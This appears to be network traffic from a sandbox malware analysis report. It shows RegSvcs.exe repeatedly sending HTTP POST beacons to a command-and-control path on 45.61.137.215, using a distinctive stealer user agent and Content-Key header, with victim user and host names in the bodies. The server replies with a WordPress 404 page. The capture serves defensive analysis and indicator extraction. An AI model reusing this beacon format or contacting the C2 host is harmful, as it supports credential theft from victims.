May 29, 2024 15:42:17.733532906 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:42:17.733547926 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:42:17.733557940 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:17.733570099 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:42:17.733580112 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:42:17.733597994 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49716	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:17.880991936 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:17.885970116 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:20.394320965 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:18 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:20.394346952 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:42:20.394360065 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:42:20.394371033 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:42:20.394383907 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:42:20.394393921 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:42:20.394406080 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:42:20.394417048 CEST	1000	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 29, 2024 15:42:20.394431114 CEST	1236	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 Data Ascii: --wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has
May 29, 2024 15:42:20.394444942 CEST	1236	IN	Data Raw: 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 Data Ascii: color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !importa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49717	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:20.544811010 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:20.549853086 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:26.020756960 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:21 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:26.020812035 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:42:26.020824909 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:42:26.020839930 CEST	224	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
May 29, 2024 15:42:26.020953894 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:42:26.020979881 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:42:26.020993948 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:42:26.021027088 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:26.021039963 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:42:26.021079063 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49720	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:26.177150011 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:26.182188988 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:28.595372915 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:26 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:28.595396042 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:42:28.595407963 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
